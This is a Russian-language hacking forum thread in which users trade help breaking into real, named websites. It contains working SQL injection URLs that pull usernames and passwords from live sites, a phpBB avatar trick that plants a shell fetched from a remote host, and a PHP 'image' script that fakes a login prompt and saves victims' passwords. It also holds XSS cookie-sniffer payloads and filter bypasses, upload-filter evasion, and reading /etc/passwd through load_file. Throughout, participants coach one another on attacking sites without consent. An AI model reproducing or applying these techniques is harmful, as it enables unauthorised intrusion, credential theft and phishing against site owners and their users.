http://www.governmentsecurity.org/forum/index.php?showtopic=15383

при запуске появилась вот:

/zero.pl http://site.com/viewtopic.php?t=9
site.com - 80 - viewtopic.php?t=9
Shell> ls -la
Shell> cat config.php
Shell>

и на любую др. команду серв не отвечает. что может быть подскажите плиз. если надо вот

пропатченный скорее всего

Здравствуйте господа! Хочу спросить у вас у хацкеров прожженных :) на днях просканил один сервак пауком версия 6.50 он мне выдал такую багу: порт 3389/tcp сервис RDP - Terminal Service Client состояние: <работает>
найдена уязвимость DoS-атака (компьютер сейчас находится в стадии перезагрузки)

Как мне локально реализовать ещё раз такую DoS-атака, может софт, какой есть, может самому как-то можно запрос сконфигурировать.
Как ваще эта атка реализуется простой Dos на указанный порт или как. Зарания всем благодарин.
p.s просьба не пинать ламера ушастого :cool:
http://www.google.ru/search?hl=ru&q=Ddos+bot&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=

Спасибо, конечно, что такое Ddos я имею представления. Меня интересует другое, каким образом сканер проводит данную Dos атаку как она реализуется, как мне повторить её с одной тачки ведь сканирования шло тоже с одной машины, а результат был получен такой (компьютер сейчас находится в стадии перезагрузки). :cool:

Спасибо, конечно, что такое Ddos я имею представления. Меня интересует другое, каким образом сканер проводит данную Dos атаку как она реализуется, как мне повторить её с одной тачки ведь сканирования шло тоже с одной машины, а результат был получен такой (компьютер сейчас находится в стадии перезагрузки). :cool:
обсуждение дидос атак запрещено на форуме

Понятно ну а с другим вопросом поможете? Опять же показал всё тот же сканер: найдена уязвимость 80/phpmyadmin/tbl_create.php иду по указанной ссылке и попадаю прямо в phpmyadmin,как мне выдернуть хеши пользователь? Если можно пошагово растолкуйте, пожалуйста.

Поищи таблицу типа "users","members",etc...

Если есть доступ к phpmyadmin и есть возможность выполнять запросы + знаешь полный путь к серваку и папку на запись - лучше залить шелл. Как залить - расписано здесь: https://forum.antichat.ru/thread104591.html

Все что могу сказать - фтопку Xspider - в подовляющем большинстве он пи**** как тротцкий, если уж так интересно что он пишет то - google.ru - уязвимость в phpMyAdmin + tbl_create.php, по досу - уязвимость в RDP + DDOS.

Поищи таблицу типа "users","members",etc...

Направления правильное держу?
http://s44.radikal.ru/i104/0907/b3/afdfc9797634.jpg

Pashkela спасибо.

Тут БД mysql. В текущей таблице находятся даные о пользователях mysql. Чтобы просмотреть их - нажми "Обзор"

Зашёл в раздел pwweb в таблице pw_users:
Username NoN,
Password 875e527b6de108747f61decbd553947e:zHoPeRWthe816pjgR ...
Usertype Super Administrator
Какой тип хеша используется?

Привет
У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое

нашёл инъекцию
http://site.ru/index.php?name=Links'
далее довёл до ума

http://site.ru/index.php?name=Links'))--

\Потом начал крутить таблицы
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_S CHEMA.TABLES)--
получил 1 табличку audit и решил проверить что ниже
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+('audit'))--
На что меня послали куда подальше
message: Incorrect syntax near 'audit\'.

видно что он скобку экранировал...(пробовал " ' `)
Как можно это обойти?
Попробовал в хексе но написал еррор
message: Conversion failed when converting the nvarchar value 'audit' to data type int.

http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх

http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх
message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.

message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.

_http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(char(97)%2Bchar(117)%2Bchar(100)%2Bchar( 105)%2Bchar(116)))--
еще можно попробовать having заюзать..
http://forum.antichat.ru/showpost.php?p=445214&postcount=23

Возникла проблема... Пробую залить шелл в phpbb! есть права админа... пробую этот способ:

...
6) Загрузка аваторы с php кодом, а затем инклюд.(Нужны права админа)
Бага тоже очень распространненая, тока почему то ее, мало юзают.
Создаем файл kiborg.txt, пишем в него

<?
$file= fopen('shell.php', 'w');
fwrite($file, '<? @include("http://kiborg.h10.ru/shell/sim.txt"); ?>');
fclose($file);
?>

Меняем имя файла на kiborg.gif и загружаем его на форум.
Заходим в профайл убеждаемся что аватора загрузилась и смотрим ее имя с путем, будет примерно следующее
/images/avatars/49624519384cd7deb.gif
Создаем файл 1.sql с содержимым

UPDATE phpbb_config SET config_value=CONCAT('english/../../images/avatars/49624519384cd7deb.gif',CHAR(0)) where config_name='default_lang';

Ну если с мозгами все в порядке, то поймете что здесь накалякано. Востанавливаем через бд.
Ползем по ссылке
http://localhost/phpbb13/faq.php
И если вы все сделали правильно, то по адрессу http://localhost/phpbb13/shell.php должен быть ваш шелл.


Делаю всё как написано, но когда загружаю аватар выдаёт ошибку..((

Общая ошибка

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php


Подскажите в чём проблема... :(

http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.

Хорошо, а как дальше колонки крутить если такая проблема?

.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.

уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables

уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables

http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27+from+information_schema.tables+group+by+ table_schema+limit+0,1


как определить, включены мэджики или нет,




http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,'test',4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27

если есть слово test то off если ошибка то on

.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
Ты видимо не прочёл что выше было...
У меня ковычка экранируется...

http://www.board.kr.ua/wap/adv.php?id=34+order+by+4
Как эту расскрутить?

Ты видимо не прочёл что выше было...
У меня ковычка экранируется...Хекс, чар...

mailbrush:

http://www.board.kr.ua/wap/adv.php?id=34+and+substring(version(),1,1)=4--+

Да о слепой я и без этого знаю, но вывода бы хотелось :)

INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')

Выходит такая ошибка.
Както можно обойти экраниковку ковычки по другому?
Пробовал ')--+ ')/* ')%23 ')# '){
Также пробовал менянь ' на %27
попробовал так сделать %2527)--
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0%27)-- ')

Может ещё можно в Ип адрес инекцию сделать? Как передать браузеру другой ИП?

2 mailbrush: дык вроде нету

2 Byrger:

А смотря как этот IP определяется, если пишется х-форвадер, то можно, если реальный - то фиг. В общем вероятность очень мала, забей на IP

http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]=">XSS


Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) :(
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер)

<?php
if (isset($_POST['Upload'])) {

$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];

if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){


if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>Your image was not uploaded.</pre>';
} else {
echo '<pre>' . $uploaded_name . ' succesfully uploaded! </pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}

?>


И еще....
Как это можно обойти?

kartinko.php%00.jpg можно попробовать:


<?php
$uploaded_name = 'text.php%00.jpg';
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
echo $uploaded_ext;
?>

kartinko.php%00.jpg можно попробовать:


<?php
$uploaded_name = 'text.php%00.jpg';
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
echo $uploaded_ext;
?>

Не помогает(хотя была такая идея но и не помогает она после того как я испробывал)... Так как переиминовывается почему то в my.php%2500.jpg

Странно, только что погонял локально с помощью такой формы:


<?php
if (isset($_POST['Upload'])) {

$target_path = "/home/dfgdf/http/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];

if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>Your image was not uploaded.</pre>';
} else {
echo '<pre>' . $uploaded_name . ' succesfully uploaded! </pre>';
}
} else {
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>

<form enctype=multipart/form-data method=post><input name=uploaded type=file><input type=submit name=Upload>


Всё загружается как есть, php не прокатит, т.е. в итоге если загрузил 5.php%00.jpg - то локально так файл называться и будет, если загрузил 5.php%2500.jpg - то локально так файло называться и будет, в браузере есс-но не отображается - пишет

requested URL /5.php was not found on this server

Т.е. при обращению по урл - да, разрешние второе обрезается, в случае сохранения %00.jpg, а вот откуда там берется %2500.jpg - непонятно, возможно не весь код показал

Так что не получиться, разрешение четко отсекает, если не jpg - гуляй Василий

ЗЫЖ Ну по крайней мере это мой мнение

Тестил при всяких маджиках и он и офф - одна фигня. Если только локальный инклуд, он так можно и просто в картинку код запихать

Pashkela, ты не прав... теория это конечно хорошо, но практика важнее. Когда ты перехватываешь данные с помощью Tamper Data и вставляешь %00 в имя файла, ты забываешь, что это не GET а POST данные, другими словами когда ты вставил %00 надо еще раскодировать данные (правой кнопкой на названии массива и в полученной менюшке пункт раскодировать)

2 Scipio:

Непонятно что-то, объясни тупому, ну тыкнул на POST_DATA, нажал раскодировать, и что дальше? Можно шелл залить?:) Ты имеешь в виду, что делается urldecode? И что это нам может дать? Ну вставил туда %00 или наоборот убрал - проверяется все равно позже в данном конкретном примере. Чото недогоняю

Не, понятно, что принцип как у Шанкара в сплойте для PHPBB примерно, только все равно не понятно. На пальцах бы объяснить

РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!



Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!

Народ а тема c php кодом в .gif файле больше не работает ? чтобы вместе с картинкой авторизация вылетала...
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="http://victim/ - Login"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Staratel, изменять даных в инъекциях нельзя.
piton, все работает. Надо только правильно настроить.

настроил и файл .htaccess и тд раньшевсе работало а щас ниодин браузер не понимает.

Вот, держи: http://bestquest.info/other/image.zip

Инструкция:
1. Заливаешь на хост.
2. Ставишь CHMOD 777 на папку, CHMOD 755 на скрипт.
3. Кидаешь ссылку кому-то на image.gif.
4. Если юзерр ввел пасс > 4 символа, смотришь файл passwords.txt (он создастся при вводе пароля).

Staratel, изменять даных в инъекциях нельзя.
Поспорю...
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)

если скуля в update, insert, delete то можно изменять(в рамках запроса конечно же, и уязвимых переменных)

В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
И в MsSQL тоже, и еще в нескольких БД.

Я говорил про MySQL и про SELECT.

РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!



Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!


http://milw0rm.com/papers/149

прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.

чтото не то =\\

провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected

в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\

пс и коментрии страно срабатывают ..

/* - работает только если его потом закрыть

-- работает странно както если сделать

union select 1,2,3,4((1='1 AND (ishidden=0))

он напишет

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1

а если union select 1,2,3,4--((1='1 AND (ishidden=0))

напишет

Invalid query: Unknown column 'ishidden' in 'field list'

тоесть срабатывает как робел Оо

а # вще не срабатывает =\\

http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]=">XSS


Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) :(
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер)
Ап

Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого mysql_select_db('mysql'); , а сам sql запрос выглядит например так:$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id; т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23

где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг

где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг


Так проще, узнал допустим таблицу:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ,table_schema),7,8,9,10,11+from+information_schema .tables+limit+23,1--

Узнал колонки:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_nam e),7,8,9,10,11+from+information_schema.columns+whe re+table_name=0x6C6F67696E+limit+0,1--

Достал информацию, которая тебе нужна:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,p sw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--

А так, читай статьи, юзай SIPT.

Ап
"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)

"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)

Problema so znakom "="

2. 5 ветка требует закрытых /* коментов (как mssql)
Поправлю:
>= MySQL 5.0.51

До этого можно незакрытые

The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))

Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.

Используй String.fromCharCode()

Используй String.fromCharCode()

так как я использую эту функцию если я пихаю в поле <script>alert()</script> и в исходниках без <>
вот так scriptalert()/script

Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”

нубхакер

http://ha.ckers.org/xss.html там снизу есть Character Encoding Calculator
В поле ASCII Text: вставляешь <script>alert('')</script>
Жмешь encode
Дальше содержимое

Decimal Value:
HTML (without semicolons):

Копируешь и подставляешь там где уязвимый параметр

Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”

это сакс, работает токо в ослике. не факт, что у админа осёл. ЗЫ вопрос. в версии phpbb 2.0.xx в куках лежит хэш пасс?


add// нашол нормальную пасивку, всё теперь буду хекать популярный сайт.

народ пытался раскрутить не получается взять )
http://www.***.com/news/news.php?id=2983+union+select+1,2,3,4,5,6,7,8,9/*
http://www.***.com/news/news.php?id=2983+union+select+1,table_name,3,4,5,6 ,7,8,9+from+information.schema.tables/*
забираю tables:user
подбираю колонки переведя таблицу в sqlhex - password, user
Пытаюсь добыть инфу
http://www.***/news/news.php?id=2983+union+select+1,concat_ws(0x3a,pas sword,user),3,4,5,6,7,8,9+from+user/*
И выходит пустое место где во всех пред случаях работала sql-inj =((( тоесть страница выходит как надо, но место sql пустое (
Вот
http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws%280x3a,password,user %29,3,4,5,6,7,8,9+from+user--

2la.painkiller +limit+x,1/* x=0....10000

ну так без limit должно выводить первое значение.
Мне больше интересен факт почему так?

пс. с лимит тоже не выводит

2la.painkiller

Базу указывать надо. Таблица в другой базе. И статьи читать ПЕРЕД тем как вопросы задавать.

http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9+from+mysql.user/*

просто всегда срабатывало без базы сразу с таблицы
спс
всем + репу

Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?

Нет, надо знать пароль, с сессией можешь только творить дела на форуме, которые может творить админ - удалять, читать закрытые разделы и etc.

Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?
Если не ошибаюсь - там как бы сессия админа(та что в админ панель после конферма) к IP привязываеться, найти/поднять проксик с его IP(что мне кажеться будет еще сложнее чем покоцать этот форум).

http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]=">XSS


Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) :(
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер)

так всетаки, как можно обмануть фильтрацию = ?
или как сделать ссылку на сниффер без =

Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого mysql_select_db('mysql'); , а сам sql запрос выглядит например так:$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id; т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
Я получал такой же вывод и в пыхадмине, неплохо намудрив с JOIN.

http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135

Помогите по данному вопросу.

http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135

Помогите по данному вопросу.
кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')

кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')

да 3 слеша

У меня вопрос. Я тут http://www.bringitontours.com/package/index.php?destination_id=
Хотел заюзать уязвимость в БД, определил количество таблиц 3, но неполучаеться узнать их названия. Вот запрос http://www.bringitontours.com/package/index.php?destination_id=1+union+select+table_sche ma,table_name,1,2,3+from+information_schema.tables .


Где ошибка?

2 +casper+
1) ты неправильно составил запрос ... должно было быть так

http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,version()

2)там стоит 4 ветка соответсвено там нет information_schema

В ДНК, 4-ая ветка потому что:


http://www.bringitontours.com/package/index.php?destination_id=1+and+substring(version() ,1,1)=4

А как мне правильно сформировать запрос что б глянуть названия всех таблиц?

Только перебор. Сипт в подписи предыдущего дяди:)

Собственно есть пароль... Надо его преобразовать в mysql5 хеш, как это сделать?

http://www.insidepro.com/hashes.php

MySQL>SELECT password( 'password' )

на одном форуме получилось вставить между тегами
[ IMG]...[ /IMG] ссылку на снифер, в итоге каждый юзер, просмотревший мой пост, оставлял на снифере ip и куки. сам вопрос: это и есть пассивная xss? так же выходило вставлять в посты джава скрипты и они выполнялись. подскажите какие можно проводить более интересные операции кроме как кража куки или отображение айпи.

на одном форуме получилось вставить между тегами
[ IMG]...[ /IMG] ссылку на снифер, в итоге каждый юзер, просмотревший мой пост, оставлял на снифере ip и куки. сам вопрос: это и есть пассивная xss? так же выходило вставлять в посты джава скрипты и они выполнялись. подскажите какие можно проводить более интересные операции кроме как кража куки или отображение айпи.

На некотрых двигах, можно было бы сформировать код. который добавит тебя в админы и т.п. т.е. ты можеш делать любые дейсвия с браузером

На некотрых двигах, можно было бы сформировать код. который добавит тебя в админы и т.п. т.е. ты можеш делать любые дейсвия с браузером
ну форум на vBulletin 3.8.2

ну форум на vBulletin 3.8.2
Ты хочешь сказать, что нашёл XSS в последней булке?

По теме пара статей:
https://forum.antichat.ru/thread20140.html
https://forum.antichat.ru/showthread.php?t=42326

Подскжите плиз, по какой схеме хэшируется MD5 в vbulitenn. т.е. какой мне режим брута выбрать в passwordpro

Подскжите плиз, по какой схеме хэшируется MD5 в vbulitenn. т.е. какой мне режим брута выбрать в passwordpro
в булке md5(md5($pass).$salt)

md5(md5($pass).$salt) - используется в форуме vBulletin 3.x.x.
--
опоздал с ответом. :)

Есть такой сайт celestialflame.ru он на движке vBulletin 3.7.3 порывшесь на форуме нашел экспоит (http://www.milw0rm.com/exploits/7174) но он неподходит т.к Add-она этого на сайте нет. Порывшись еще немнога на сомом сайте нашел что он использует phpMyAdmin 2.11.4(Link (http://celestialflame.ru/phpmyadmin) ) но опять же нечего полезного из этого невышло. Посоветуйте чем можна побороть саитик. Ява скрипт форум оплёвывает намертво поэтаму XSS непраходит (снифер выдает всё кроме самих кукис(LOG (http://3ton1.freehostia.com/2/log.php) )).Потскажите в какую сторону рыть.
P.S Зарание прашу прощения за нубство.

Столкнулся с одной проблемой, нашел SQL инъекцию на одном сайте, узнал полный путь до вордпресса, он идёт что-то типа такого:

E:\site.com\blog\wp-content\themes\default\functions.php

Пробывал прочесть - не получается, не могу понять что за нах (

файлик /etc/passwd - читается отлично, так же как и в /tmp/ льется шелл.

Подскажите как прочитать файл по данному пути с помощью функии load_file():

E:\site.com\blog\wp-content\themes\default\functions.php

Зарание спасибо, пишите в личку.

load_file('полный_путь_до_нужног о_файла')

load_file('site.com\blog\wp-content\themes\default\functions.php');
Или же в hex

Столкнулся с одной проблемой, нашел SQL инъекцию на одном сайте, узнал полный путь до вордпресса, он идёт что-то типа такого:

E:\site.com\blog\wp-content\themes\default\functions.php

Пробывал прочесть - не получается, не могу понять что за нах (

файлик /etc/passwd - читается отлично, так же как и в /tmp/ льется шелл.

Подскажите как прочитать файл по данному пути с помощью функии load_file():

E:\site.com\blog\wp-content\themes\default\functions.php

Зарание спасибо, пишите в личку.

Нас наёбывают, извините за выражение.
Ну какой /etc/passwd
если путь начинается с E:\?
Ну или наоборот, если есть /etc/passwd и есть /tmp значит путь до сорцов наверняка начинается не с E:\.

В остатке: либо путь узнан неверно, либо там какой нить ханипот или ids, которая тебе пассвд и тмп подсовывает(что маловероятно).

Нас наёбывают, извините за выражение.
Ну какой /etc/passwd
если путь начинается с E:\?
Ну или наоборот, если есть /etc/passwd и есть /tmp значит путь до сорцов наверняка начинается не с E:\.

В остатке: либо путь узнан неверно, либо там какой нить ханипот или ids, которая тебе пассвд и тмп подсовывает(что маловероятно).
я об этом думал уже, но возможно человек решил скрыть путь к файлу от лишних глаз и по незнанке *nix систем и написал оконный путь.

Но так же интересно, как он смог увидеть /etc/passwd и /tmp если он не знает как использовать load_file()?

Так что вариант с ханиподом вполне вероятен.

Дело в том что при ошибке скрипта мне пишет полный путь начиная с диска E:\, прописывая полный путь с диском прочитать не получается, прописав load_file('/etc/passwd') читается отлично в котором пути до юзеров совсем другие, не те что при ошибках отображаются...

ханипод/ids - это предположение(!)
или линк для полной информативности

в личку отписал

Вообщем ты немного не так взял, смотри:
обрати внимание на доменное имя того движка где SQL-inj и того где раскрытие путей(!) и тем более на их IP(!) - это два разных сервера.

w**.w**.***
13*.12*.0.***

g**.w**.***
13*.12*.229.***

Как узнать соседей сайта? Кто еще хостится на хостинге. РАньше был домаинсдб....

http://2ip.ru/domain-list-by-ip/
http://madnet.name/tools/madss/

один-два

Как узнать соседей сайта? Кто еще хостится на хостинге. РАньше был домаинсдб....
http://madnet.name/tools/madss/

подскажите как из кэши браузера подгрузить флэшку???

Как узнать соседей сайта? Кто еще хостится на хостинге. РАньше был домаинсдб....
www.domaintools.com

www.domaintools.com
Я юзаю http://2ip.ru/domain-list-by-ip/

подскажите как из кэши браузера подгрузить флэшку???
смотри в файлах,
Просто в каждом браузере свой кэш.
а в IE прям как есть файл так и сохраняется.
ищи по swf

смотри в файлах,
Просто в каждом браузере свой кэш.
а в IE прям как есть файл так и сохраняется.
ищи по swf
мне не файл нужно найти, мне нужен код (скорее всего на javascript) подгружающий флэшку не из инета, а из кэши браузера.

мне не файл нужно найти, мне нужен код (скорее всего на javascript) подгружающий флэшку не из инета, а из кэши браузера.
Такое невозможно)

название файла нужно знать и так же для определенного браузера свои методы загрузки из кэша

название файла нужно знать и так же для определенного браузера свои методы загрузки из кэша
Вообще можно, но там то проверка на урл.

название файла нужно знать и так же для определенного браузера свои методы загрузки из кэша
допустим название файла известно. Какие методы возможны в ИЕ, Фаерфокс или Опера???
Заранее благодарен.

Поодскажите плиз. в проге inetcrack в какое поле надо в писывать код чтобы инклудилось в еррор лог

вот исхлдное

GET http://ya.ru/ HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows
98)
Host: ya.ru
Proxy-Connection: Keep-Alive

